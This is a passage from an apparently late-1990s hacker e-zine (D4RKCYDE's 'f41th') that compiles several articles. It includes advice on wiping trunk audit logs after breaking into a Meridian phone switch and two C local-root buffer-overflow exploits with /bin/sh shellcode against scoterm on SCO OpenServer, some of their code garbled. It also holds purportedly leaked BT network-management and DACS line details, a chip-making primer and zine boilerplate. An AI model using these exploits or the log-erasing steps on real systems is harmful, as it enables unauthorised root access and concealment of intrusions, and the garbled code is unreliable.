Anything you want? Thats just a few ideas. But before you do ANYTHING, you should be aware that anything you do could have devestating impact on the companys phone switch. For example, say you accidently commanded the system to shut down.. You would effectivly be killing 6000+ peoples phone lines, which would yield colosal financial burden/loss onto the company. Generaly I'm just saying, be nice.. Just because you have the power to do such things, it doesnt mean you have to do it. :) A final note: In the aftermath of obtaining access to a merdian switch, it is generaly advisable to erase all trace of you ever being on there. This can be achived by reseting trunk audit logs, and erasing any log of your incoming trunk setups. Therefore, if the real admin decided to track what was going on he/she would get nowhere because the lines you used to initially call into the system DO NOT EXIST. Its just a case of using your imagination. Don't be destructive, Don't alter anything that would be noticed, Generally don't be a f00l.. Thats the end of this file, I hope you enjoed it. Take it easy. Shouts to D4RKCYDE, NOU!, b4b0, 9x, subz, pbxphreak, lusta, gr1p, LINEMANPUNX. . .. ... .......... BL4CKM1LK teleph0nics .......... ... .. . . .. ... .......... http://hybrid.dtmf.org ......... ... .. . . : | +-+[ SCO buffer overflow lameness ]+---> by darkraver <----------------------+ +-+[ D4RKCYDE ]+---> <----------------------+ | : . SCO patches lameness -------------------- The Dark Raver I installed a good SCO OpenServer 5.0.4 on my box some months ago and spent some time playing with it and coding some exploits. Some of my friends have been testing these exploits on other machines and surprisingly some of them had told me that some of the bugs exploited were still present in the patched binaries of SCO. I knew that Sun and SGI had shipped some patches that didn't work correctly but I couldn't imagine SCO doing the same thing. For example, the old well known scoterm bug: ------------------------------------------------- $ /usr/bin/X11/scoterm.old -display `a 10000` Error: Can't open display: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa $ /usr/bin/X11/scoterm.old -geometry `a 10000` Segmentation Fault (core dumped) $ /usr/bin/X11/scoterm.old -fg `a 10000` Segmentation Fault (core dumped) $ /usr/bin/X11/scoterm.old -bg `a 10000` Segmentation Fault (core dumped) ------------------------------------------------- A lot of overflows... And one of my first exploits, exploiting the -geometry overflow: ------------------------------------------------- /* * Local root exploit * * Offset: scoterm (SCO OpenServer 5.0.4) * 0 -> From an open scoterm (without display parameter) * 2500 -> From remote telnet (with display parameter) * * Usage: * $ cc scotermx.c -o scotermx * $ scoterm * $ /usr/bin/X11/scoterm -geometry `scotermx 0` * or * $ /usr/bin/X11/scoterm -display 1.1.1.1:0 -geometry `scotermx 2500` * * Note: scoterm need to be run from a valid x-display * * By: The Dark Raver of CPNE (Murcia/Spain - 21/6/99) * * - * */ #include #include char hell[]= "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; /* char hell[]= "\xeb\x1b" // start: jmp uno "\x5e" // dos: popl %esi "\x31\xdb" // xorl %ebx,%ebx "\x89\x5e\x07" // movb %bl,0x7(%esi) "\x89\x5e\x0c" // movl %ebx,0x0c(%esi) "\x88\x5e\x11" // movb %bl,0x11(%esi) "\x31\xc0" // xorl %eax,%eax "\xb0\x3b" // movb $0x3b,%al "\x8d\x7e\x07" // leal 0x07(%esi),%edi "\x89\xf9" // movl %edi,%ecx "\x53" // pushl %ebx "\x51" // pushl %ecx "\x56" // pushl %esi "\x56" // pushl %esi "\xeb\x10" // jmp execve "\xe8\xe0\xff\xff\xff" // uno: call dos "/bin/sh" "\xaa\xaa\xaa\xaa" "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 */ #define OFF 0x80452ff // SCO OpenServer 5.0.4 #define ALINEA 1 #define LEN 2000 int main(int argc, char *argv[]) { int offset=0; char buf[LEN]; int i; if(argc < 2) { printf("Usage: scotermx \n"); exit(0); } else { offset=atoi(argv[1]); } memset(buf,0x90,LEN); memcpy(buf+1000,hell,strlen(hell)); for(i=1100+ALINEA;i Local root exploit * * Offset: /usr/bin/X11/scoterm => Work only against patched binaries, * for default binaries use the old exploit. * -2000 -> Started from scoterm or xterm on localhost * 0 -> Started from remote telnet (with valid display parameter) * * Usage: * $ cc st2.c -o st2 * $ /usr/bin/X11/scoterm -display 1.1.1.1:0 -geometry `st2 0` * * By: The Dark Raver of CPNE (Spain - 5/8/99) * * - * */ #include #include char hell[]= "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; /* char hell[]= "\xeb\x1b" // start: jmp uno "\x5e" // dos: popl %esi "\x31\xdb" // xorl %ebx,%ebx "\x89\x5e\x07" // movb %bl,0x7(%esi) "\x89\x5e\x0c" // movl %ebx,0x0c(%esi) "\x88\x5e\x11" // movb %bl,0x11(%esi) "\x31\xc0" // xorl %eax,%eax "\xb0\x3b" // movb $0x3b,%al "\x8d\x7e\x07" // leal 0x07(%esi),%edi "\x89\xf9" // movl %edi,%ecx "\x53" // pushl %ebx "\x51" // pushl %ecx "\x56" // pushl %esi "\x56" // pushl %esi "\xeb\x10" // jmp execve "\xe8\xe0\xff\xff\xff" // uno: call dos "/bin/sh" "\xaa\xaa\xaa\xaa" "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0 */ #define OFF 0x7fffeb80 // SCO OpenServer 5.0.4 #define ALINEA 2 #define LEN 1500 int main(int argc, char *argv[]) { int offset=0; char buf[LEN]; int i; if(argc < 2) { printf("Usage: st2 \n"); exit(0); } else { offset=atoi(argv[1]); } memset(buf,0x90,LEN); memcpy(buf+600,hell,strlen(hell)); for(i=700+ALINEA;i by hitman <----------------------------------+ +-+[ D4RKCYDE ]+---> <----------------------------------+ | : . [Making A Computer Chip Part A] >>>>>>>>>>>>h1tman<<<<<<<<<<<<< /* I did not write this article,my comp science teacher gave it to */ /* me and i am merely typing it up for informational purposes only */ A computer chip is made by building layers of electronic pathways and connections using conducting and non-conducting materials on a surface of silicon. The combination of these materials into specific patterns forms microscopic electronic components such as transistors, diodes, resistors, and capacitors; the basic building blocks of electronic circuits. Connected together on a chip,these components are referred to as an integrated circuit. The application of the conducting and non-conducting materials to the silicon base is done through a series of technically sophisticated chemical and photographic processes. Some of the manufacturing steps are shown in the following paragraphs. A computer chip begins with a design developed by engineers usings a computer aided circuit design program. In order to better view the design, greatly enlarged printouts are prepared. Some chips only take a month or two to design while others may take a year or more. A seperate design is required for each layer of the chip. Most chips have at least four to six layers but some have up to fifteen. Although other materials can be used, the most common raw materials used to make chips is silicon crystals that have been refined from quartz rocks. The silicon crystals are melted and formed int a cylinder five to ten inches in diameer and several feet long. After being smoothed, the silicon ingot is sliced into wafers four to eight inches in diameter and 4/1000 of an inch thick. Much of the chip manufacturing is performed in special laboratories called clean rooms. Because even the smallest particle of dust can ruin a chip,the cleans rooms are kept 1000 times cleaner that a hospital operating room. People who work in these facilites must wear special protective clothing called bunny suits. Before entering the manufacturing area, the workers removed any dust on their suits in an air shower. After the wafer has been polished and sterilized, it is cleaned in a chemical bath. Because the chemicals used in the cleaning process are dangerous, this step is usually performed by a robot. After cleaning, the wafers are placed in a diffusion oven where the first layer of material is added to the wafer surface. Other materials, called dopants, are added to the surface of the wafer in a proces called ion implantation. The dopants create areas that will conduct electricity. Channels in these layers of materials are removed in a process called etching. Before etching, a soft gelatin-like emulsion called photoresist is added to the wafer. During photolithography, an image of the chip design, called a mask, is used as a negative. The photoresist is exposed to the mask using ultraviolet light. Ultraviolet light is used because its short wavelength can reproduce very small details on the wafer. Up to 100 images of the chip design are exposed on a single wafer. The photresist exposed to the ultraviolet light becomes hard and the photoresist covered by the chip design on the mask remains soft. The soft photoresist and some of the surface materials are etched away with hot gases leavinig what will become circuit pathways. The process of adding material and photoresist to the wafer,exposing it to ultraviolet light, and etching away the unexposed surface, is repeated using a different mask for each layer of the circuit. After all circuit layers have been added, individual chips on the wafer are tested by a machine that uses probes to apply electrical current to the chip circuits. In a process called dicing, the wafers are cut with a diamond saw into individual chips called die. Die that have passed all tests are placed in a ceramic or platic case called a package. Circuits on the chip are conned to pins on the package using gold wires. Gold is used because it conducts electrcity well and does not corrode. The pins connect the chip to a socket on a circuit board. Continued in Part B... . : | +-+[ System X network administration ]+---> by hybrid <----------------+ +-+[ D4RKCYDE ]+---> hybrid@dtmf.org <----------------+ | : . _\|/_ [ GBH ] Gwahn Burnin Haxorz [ GBH ] _\|/_ BT Network Administation Support System Development SYSTEM X and OMC network operations.. BT PhoneBone tekniq By hybrid NOT TO BE SHOWN OUTSIDE BT. GBH internal awarez. [ _\|/_ ] | GBH | : : . . PART I (Introduction to BT managment on the PSTN) Introduction The technology within the network has advanced through digitalisation of both transmission and switching, and the introduction of computer contolled network elements. The greater reliability of this technology and the ability to manage and configure the elements remotely has created new opportunities for efficiant managment of the network. These opotunitys have been translated into a vision for the future operation and managment of the network, initially through the Network Administration Task Force (NATF) and subseqent refinements in terms of architecture (Network Managment Architecture), and process (Strategic Systems Plan (SSP)). THE VISI0N The vision can be summerised as: -+ end-to-end network managment -+ functioncal coverage of the whole network life cycle -+ fully integrated functionality -+ high levels of automation/decision support -+ conformant to architectual objectives: a) network managment hierarchy b) co-operative network architecture c) open systems platform End-to-End managment It is essential to be able to manage networks made up of elements from different vendors and different generations of equipment in a consistant manner, so that the network can be viewed as a complete entity which provides a managed service platform. Whole Life Cycle Networks and services must be managhed from 'cradle to grave' (figure 1), covering: -+ forecasting -+ requirments analysis -+ detailed dimensioning and project planning -+ data building -+ installation and commisioning -+ maintenance/billing/traffic managment -+ repair -+ performance -+ enhancment/withdrawal future service | pre-service | | requirments | data building O forceasting / \ installing / \ performance / \ commissioning /\ \/ / \ FIGURE 1 / \ NETWORK AND / \ SERVICE LIFE O---------------<---------------O CYCLE / \ / \ / statistics billing maintenance \ traffic managment repair Hands free operation It is essensial to give network managers a high level of automation in order to eneable them to cope with the levels of complexity involved, vast amounts of data, apparently random nature of problems, and the need for speed, accuracy and consistancy in decision making. This requires: -+ incidents to be analyised automatically with the manager's concurance being sought to the solution offered; -+ automatic restoration of service to be achived whenever possible; -+ jobs depached to the workforce based on an optimum approach to jeopardy, costs, tactics and company image. -+ customers notification of service affected generated automaticaly to the approproate customer-facing unit; and -+ performanace statistics kept and analysed on all key proccesses. Development challenges The challenge for the system developers is to be responsive and meet new requirments quickly, while producing enduring systems which fit within an integrated set-the jigsaw-- the whole evolving towards the Network Administration Implementation Program (NAIP) and SSP vision in a cost effective manner. The developers have to move from a possision of well over 200 systems, most of which do not interwork, and many of which no longer offer all the essensial fucnctions, to a set of around 40 fully integrated high functionality key systems. Functions must be brought into line with the required buisness proccesses and must evolve to match the demands of new network technologys, for instance, planning rules for fibre systems must be continually reviwed to encompass increasing capacities and repeaterless operation. Systems must also take account of the changing operational organaisations and procedures, framework which can evolve without damaging the software investment already made. Solutions have to be achived within four planes of change as illustrated in figure 2. -+ linked planes of change +--------+ +------------------------------------------+ | | | | -+ people | | | | -+ groups/duties | N O-><-O-- | -+ skillz | | | USER ORGANISATION | -+ procedures | E | +-------------------o----------------------+ | | | | T | +-------------------|----------------------+ | | | | | -+ maintainence | W | | : | -+ planning | O-><-O-- | -+ repair control | 0 | | NETWORK MANAGMENT FUNCTIONS | -+ traffic/control | | +-------------------o----------------------+ -+ data building | R | | | | +-------------------|----------------------+ | K | | | | -+ computers | | | : | -+ terminals | O-><-O-- | -+ database | | | COMPUTING AND HOST ARCHITECTURE | -+ etc. +--------+ +------------------------------------------+ PART II (Adminstration of BT Network layers) ohday. -+ Interface Architecture The interface architecture provides the means to link all the pieces of the jigsaw together. By a mix of Open Systems Interconnection (OSI) products and pragmatic proprietry products, (for example, SNA, DECNET), a communications infastructure will be deployed to connect users to systems, systems to other systems for information sharing, and systems to the network elements they are managing. Key standards for these interfaces are being defined in the Co- Operative Networking Architecture (CNA-M) prgramme. -+ Data Architecture Data architecture offers the ability to standardise what the processes need to talk about. Defining the structure and format of the key information items provides a common currency which may be shared by the complete family of support systems. The object orientated style of the CNA-Managment communications protocols will ofrce the standardisation of objects as well as simple data structures in the CNA-M programme and external standards bodies like ISO, CCITT and the OSI Network Managment Forum. -+ System (Computing) Architecture The system architecture defines how a particular system is constructed, rather than the fucntional role it plays within the jigsaw. This deals with the following main conponments. -+ computer hardware -+ operating system -+ database managment system -+ transaction proccessing -+ communications drivers -+ man -- machine interfacing (MMI), and -+ application programming interface (API). There is a drive by the computing industry to create standard open interfaces to these elements, based on UNIX/POSIX and X Open standards to produce the open platform. The system developers are also driving towards reusable sub- functions and utilities. These two initiiatives are being bought together in the Generic Systems Architecture (GSA). -+ Integration and evolution SSP, ONA-M, Generic Systems Architecture and the Network Control Architecture Board (NCAB) 5 year vision for support systems evolution have all contibuted to creating a clear picture of how support systems will look in the future. It is important, however, that a very pragmatic approach is taken to realising this vision. -+ SWITCH MANAGMENT BT switch managment is carried out by the OMC (Operations Maintanace Center) for local exchanges and the operations and maintanance unit support system (OMUSS) (an OMC derivative) for trunk exchanges. This system has clocked up over 3000 system months of reliable service sinse its introduction n 1984. As the first majour network managment system, it has paved the way for the NACC/NOU structure. +-------------+ +---------+ +-----------+ | |<-----------------. | NMW2 | | | | CSS |<---------. | +---------+ | DCSS | +-------------+ | : | | | +--:-------------+ +-----------+ | | | | | NOMS 2 |-------------------. : | | | : +-/--------/--|--+ +-----:-----+ .- - - - - : - -/- -. / | | | | : / | / | | NOMS 1 | :/ :/ :/ : | | +------+ +---/--+ +--/---+ +---:--+ +-----------+ | | | | | | | | | | | | | FAS | | OMC | | TMS | | OMUSS| : : : : +------+ +------+ +------+ +------+ ALARMS :\ :\ :\ :\ | | | | | : | : | .----------. | .----------. .----------. .--------. | | | | | | | | | | : | | : | | | INTER- | | HOUSE O=========O LOCAL O=========O TRUNK O=========O NATIONAL O=== |________| | | | | | | |____:_____| |____:_____| |__________| : \ / : ______ : \ / : | | : x : |______| : / \ : .----:-----./ \.----:-----. | | | | | | | | | DDC |-------->| DESS | | | | | |__________| |__________| -+ CSS : Customer Service System -+ NMW2 : Network Managment Workstation -+ DCSS : District Control Support System -+ NOMS : Network Operations Managment System -+ FAS : Fibre Access System -+ OMC : Operations and Maintanance Center -+ TMS : Transmission Monitoring System -+ DDC : District Data Collector -+ DESS : Digital Exchange Support System -+ OMUSS : Operations and Maintenance Unit Support System There are over 60 systems in field serivce, with over 10,000 registered users, covering all trunk and local System X and AXE switches. Enhancment continues to run at a considerable pace, working its way into the field through two major realeses per year. +------------+ +--------+ +------------+ | EXCHANGE A |<----------| |<------------| EXCHANGE Z | | |---------->| |------------>| | +------|-----+ +----|---+ ^ +------|-----+ | | | | ==============|======================|=========|==============|============= : : : : +------:-----+ +---------:---------:---+ | ALARMS HAN | | | +--- | DELING SYS |<-----| O M S |----->| O-O +------:-----+ | | +--- : | | | | | +--- | | SRS LECS |----->| |_\ | | | +--- +----:----+ | | |TERMINAL | | USER FACLITYS/DUTIES | +--- |DISPLAY | | DEC VAX H/W |----->| ( ) +---------+ +-----:---:---:---:-----+ +--- | | | | | | | | A) ADMINISTRATION USERS / / \ \ B) MAINTANENCE USERS | | | | C) REMOTE USERS ^ ^ ^ ^ D) OTHER SYSTEMS A B C D -+ OMS : Operational Maintanence System -+ SRS : Subscribers Record System -+ LECS : Local Equipment Computer System The system is based on a VAX/VMS platform with Oracle relational database, its pwn basic forms/menus man --machine interface and X.25/V.24 communications drivers. The Exchange interfaces are conrolled through flexable data-driven translators and the basic structure of the system is highly modular. The priority evolution steps for OMC are: -+ interoperability with CSS, the transmission network survailance (TNS) system and workforce managment (NOMS2) -+ additional exchange interfaces for advanced services unit (ASU) etc., -+ adoption of advanced workstation (NMW2) man --machine interfacing -+ donation of functions to Generic Event Managment (GEMS). -+ Transmission Managment The transmission monitoring system (TMS) provides a comprehensive survailence system for the transmission aspects of the network. While the OMC manages a smaller set of complex network elements, the TMS faces the challenge of collecting, collating and displaying information from a vast array of physically dispersed conponments. After field-trial stages and recent product trials in London, the TMS is now being rolled out into the three pilot NOU catchment areas. The major TNS functions are: -+ alarm reception, display, filing, retrival and archiving -+ alarm association and comparason; -+ performance data proccessing and display -+ access to other systems (for example, the junction network system (JNS) database)). -+ Local Access Managment The flexible access system (FAS) is a system which has been developed to manage fibre in the local loop. Systems have been installed for the City Fibre Network and Docklands. The support system, the service access control center (SACC), once more shares a common lineage and technology platform with OMC combined with the ICENI database produced by NMD, and used as an element in the service desk and facilies managment systems. FAS was the first system to attempt to adopt the network managment hierarchy, with well defined interfaces between the service access control center (SACC) (network level controller) and element managers developed by equipment supplyers. It also adopted the network managment workstation (NMW1) to remove a multitude of various terminals. Until the future of the FAS is fully determined, the SACC will not be enhanced and evolved. However, the structure of future advanced local access managment is being considered based on experience of FAS, LLOFT (the local loop optical fibre trial) and cable TV managment. -+ Data managment and performance analysis The digital exchange support system (DESS) consists of many applications which are grouped together under a single code name. Some of the functions these appications perform are: -+ data build for new exchanges and major upgrades -+ generic network performance statistics by analysiing the large volume of data generated bt switches -+ providing national reference source for charging information, and associated validation tools to ensure charging integrety -+ provding a database and tracking mechanism for all exchange insident reports; and -+ a register of the hardware and software build levels for all exchanges in the network. DESS is a major system which runs on the largest VAX cluster configurations in the world. It supports a population of 2000 users, 140 of which may be similtaniously logged into the system. A typical daily workload for DESS would be analysing 1-4 Gigs of exchange generated data, producing 35 thousand pages of printout, and writing or reading 1500 exchange cartridges. COMMING SOON... NOMS INTERNAL NETWORKING OPER4TIONS. . . : | +----+ GBH -+o | +----> psyclone -+o +[ 4 HORSEMAN OF THE PSTN NINJ4 APPOCALIPZ ]+-- +----> hybrid -+o +[ GWAHN BURN'IN H4X0RZ ]+-- +----> gr1p -+o +----> kp -+o-----+[ _\|/_ ] | | : : . . -+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ G ]-+ -+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ B ]-+ -+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ H ]-+ . : | +-+[ digital access carrier system DACS ]+---> by hybrid <-------------------+ +-+[ D4RKCYDE ]+---> hybrid@dtmf.org <-------------+ | : . BL4CKM1LK teleph0nics [ http://hybrid.dtmf.org ] Digital Access Carrier System DACS by hybrid How did I get this info? -- Well the truth is, as a young child I was abducted by extra terrestrial biological entitys who hardwired microchips in my brain that allow me to intercept the thoughts of telecommunications engineers via ESP.. I was told to gather intricate information about the planet Earth's international PSTN, so when my people from the distant world of xinbin come to inhabit the planet, they can use the information I have transmitted to them from the microchips in my brain as a means to take over our communication networks... er, shit, thats not rite (better lay off the caffiene for a bit).. What I ment to say was, a friend of mine werks for BT, and gave me some nice info on DACS :) -werd Introduction. Digital Access Carrier System is used by British Telecom to transform one residential line into two seperate lines without actually installing an additional trunk pair. The idea of DACS is very similar to the design and implementation of the WB9OO unit used in the past (http://hybrid.dtmf.org/ files/hybrid-files/wb900.txt). The DACS system is becomming increasingly popluar in the UK beacuse more and more people are requesting additional lines, usually for net access. Digital Access Carrier System _____________ _____________ B1 | | | | B1 -------------O | single pair of | O------------- | | wires (trunk) | | analogue | E.U O==================O E.U | analogue | | digital | | -------------O | | O------------- B2 |_____________| |_____________| B2 The chances are, if you order another line from BT, they will simply multiplex your existing line into 2 seperate carriers. Think about it.. if you have one line operating on a dedicated carrier, then the line is multiplexed into 2 serperate carriers, the bandwith will be cut in half. To this date, BT are encouraging its customers to join the 'BT SuperHighway' by installing a second line.. What BT dont tell you is that you will only be able to get a maximum of 28.8bps from your 'second' line. In this file, I'll look into the DACS carrier system in detail, aswell as ways to determine what kind of trunk installation you have if you have ordered a second line from BT. Werd, enjoy the file.. DACS II The origional DACS system had limited capabilitys, and did not allow the customer to have CLASS services on their line. The newer DACS implementation is called DACS II and allows a slightly more advanced service to customers. Now people with DACSII units on their line, have access to CLASS (Customer Loop Access Signalling System). The new DACS hardware, allows customers lines to have K Break (Disconnect Clear), aswell as common services such as CLI, which where previously unavailable to DACS I customers. At the eXchange All exchanges have a database of different customers who have been fitted with the DACS equipment. Some of the commands used on the CSS database at the local terminating exchange are as follows: DISPLAY FRAME TERMINATION RANGE (to see if DACS equipment is fitted to the exchange) DISPLAY FRAME JUMPER (to determine whether a particular customer is using DACS1 or DACS2) Remote End eXchange records The Local Network Records (CSS/LNR) are modified/editited as follows on the O/S at the exchange: ENTER SHARED USE MODIFY SHARED USE DISPLAY ROUTING INVALID COMMAND Compatability of DACS: GOOD.. The provision of PSTN services when used with only BABT - approved Customer Premises Equipment upto 4 REN. Use of any phone exchange within BT's access network, except the following: Inter working with all BT's remote line test systems Self contained payphones Lines utilising CLASS K Break All modems up to 14.4bit/S working Group 1,2,3 fax machines Video phones BAD.. Earth calling PBX's Equipment that uses SPM (meter pulsed payphones) Private Services ISDN2 Steel joint user poles Certain TXE2 exchanges 300 kilohms loop calling Electricity stations DDI Group 4 fax machines DACS system schematics, diagrams.. Old Jumpering Procedure E L : : _____________ : : _____________ | | : : | | | O-:-----. .-:--O | exchange | O-:---. | | : | | external <------------O sub number | : | | | : | bar pair O------------> | | : | | | : | | cable | | : | | | : | | |_____________| : | | | : |_____________| : | | | : : | | | : : | | | : _____________ : | | | : | | : | | | : | DACS block | : | | | : | | DACS shelf : | | | : | O------------> : | | | : | | : | | | : | T B1 B2 | : | | | : |_____________| : | | | : o o o | | |_______| | | | |________________| | |_______________________| New Jumpering Procedure E L : : _____________ : : _____________ | | : : | | | | : : | DACS B1 B2 | exchange | | : : | | DACS shelf <------------O sub number | : : | O------------> | O---:----------:---|--O B2 | | O---:----------:---|--O B1 | |_____________| : : |_____________| : : : : : : _____________ : : _____________ | | : : | | | DACS trunk | : : | | DACS shelf | | : : | | external <------------O | : : | bar pair O------------> | CH2 | : : | | cable | CH1 O--O---:----------:---O | |_____________| : : |_____________| : : : : E.U Card Setup _________________________________________ .--------. | (O) (O) (O) | | | | | | | | | | | | on | | | 1 | | | | | | | | | off | 8 | | |_____(O)_(O)_____________(O)_(O)_(O)_____| | | | | | | <-- B.E.R connector |________| sw7O9 sw7O3 sw7O6 sw7OO _____ _____ _____ _____ c | | c | | c | | c | | .--------. | : | | : | | : | | : | | | | : | | : | | : | | : | | | | : | | : | | : | | : | | | | : | | : | | : | | : | | | r |_____| r |_____| r |_____| r |_____| | | b2 b1 a3 a1 | | |________| DACS 2A EU SW 1O1 (imp) (class) _____ _____ _____ _____ _____ _____ _____ _____ | | | | | | | | cpx | | | | | | | | | O | | O | | O | | O | 6OO | O | | O | | O | | O | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | en | | | | | | | | |_____| |_____| |_____| |_____| |_____| |_____| |_____| |_____| 1 2 3 4 1 2 3 4 1 SW 1O2 4 _____ _____ _____ _____ | off | | | | | | | | | | | | O | | O | 1Ok | | | on | | | | | | | | | | | | | | O | | O | | | | | 15k |_____| |_____| |_____| |_____| 1 2 1 2 (alarm) (sign) External RU Setup BT66 white B1 O--------------. blue | white | .-------------. | | grey | | | | | | | | | | | | | | | | white | | | B2 O------------. | | | orange | | | | | | | | | | | | O O O | | tail | trunk O MIMIC Resistances switch 5 on (cal) 1k ohm loop _____ _____ | | | | C a | | | | a ______ S o--------O | switch 5 off (ug) | O------------O | S b1 | | 10k ohm -50v leg b2 | | b1 | NTE | o--------O | | O------------O______| T b | | | | b E | O======================O | S | EU O======================O RU | T a | | TRUNK | | a ______ o--------O | | O------------O | A b2 | | | | b2 | NTE | C o--------O | | O------------O______| C b | | | | b E |_____| |_____| S S s/c b1 + b2 10k ohm -50v a leg b2 1k ohm loop b1 or b2 EU fault TRUNK fault customer apps fault Welp, thats it for this DACS oday info. Hope someone can find some use of it, HEH. Big shouts to gr1p, b4b0, 9x, substance, psyclone & GBH krew, tip, jorge, lusta, pbxphreak, bodie, zomba, jasun, oclet, knight, epoc, nou, everyone in #darkcyde, #b4b0, #9x HEH, werd to D4RKCYDE.. 2 years going str0ng. "that ascii took me fuckin ages.." the urls.. http://b4b0.org b4b0 http://darkcyde.phunc.com f41th http://www.ninex.com 9x http://hybrid.dtmf.org BL4CKM1LK hardcore teleph0n1cs.. (GO NOW!) ATE/>exit +++ NO CARRIER ------------------------------------------------------------------------------ B L 4 C K M 1 L K teleph0nics FUCKIN HARDCORE, BABY http://hybrid.dtmf.org/ ------------------------------------------------------------------------------ . : | +-+[ outness ]+---> by jasun <-----------------------------------------------+ +-+[ D4RKCYDE ]+---> <----------------------------------------------+ | : . If you would like to submit an article for publication in f41th, please ensure that it complies to the following: [ all articles sent to f41th must be original work ] [ all articles must be at least 15K in size ] [ all articles must be in pure .txt format ] [ all articles sent to f41th should not be released anywhere else ] If you are sending us an article that you want to have published in f41th, put [ f41th ] in the subject header in enclosed square brackets, all other mail without that header will be considered as reader feedback mail and will not appear in f41th. Visit #darkcyde on EFnet and idle with the D4RKCYDE members, supporters, friends and anyone else who happens to hang out there and sometimes chat! Use one of the following addresses to send us comments and articles, you may also use the f41th PGP key to send us secure encrypted email, which can be found below. [ hybrid@dtmf.org ] [ hybrid@ninex.com ] [ zomba@phunc.com ] Type Bits/KeyID Date User ID pub 2048/4D077481 1999/07/30 f41th -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQENAzehyBUAAAEIALNZc5Ba1zi7JrAAaJEDSXlnyQv4U47OavbwyXyidvUSv4Js siVbSAEGlLfGAEgNHgyGHxoJGdMXMoOdFLhlHAT/N6ye4NtaJGloIy34UUPd9+rj Cb+Yqz/az/Be56QaexDFSqrcOeOEZPCCNzjzlfW8EN23noHIj42zDppkOcd35VCV 0GZ2sZbKqrtfYca1yf0IVe/yoKBVF+TMfftvAO63kJ+rfl5G8t3mU5xbH7fT5UPU lrmELJf/372F2RZUCCRwWxdo14ymlSW3QVk7L+DynX7dZ9FNyrQ0Wqpyqh8Anctw O8fxYD+59n+ezuuBUomxmSiPIThFEyt4UU0HdIEABRO0IWY0MXRoIDxodHRwOi8v ZGFya2N5ZGUucGh1bmMuY29tPokBFQMFEDehyBoTK3hRTQd0gQEBm5IH/0MPx8FO Gmc0Epr9Zurk2mx9j77ZsqzvS9AkupTD7uV3UdlVGFNcl8oFUVgpUb5JiM4KuXcv 79uGIFfIy0LzCgitjPrl9STjiWHulHfkA9vdY/Tp8K+IFqXaktCagWJV2DNZF/pK u26BjNE8T3bUNo+9h9dSvzdobs5Hnj+eks5kdI/A49+hIHsrn5SAyllTL5eIsrei 33ZHwrAtu9KnGkV/YZ1a173VW+h715UgXlPtb3xA7WNVcVGQtaAPhRnLBVtDOYgV +C98dyjuS0/IgL7ZC+RYz3esvFSiKgJibL/4AU6mXUaOHspCt8d3l/aZ5+z+CKmz uaa7MkTM77rWWMM= =lLe4 -----END PGP PUBLIC KEY BLOCK----- #darkcyde EFnet http://darkcyde.phunc.com [C] D4RKCYDE Communications EOF.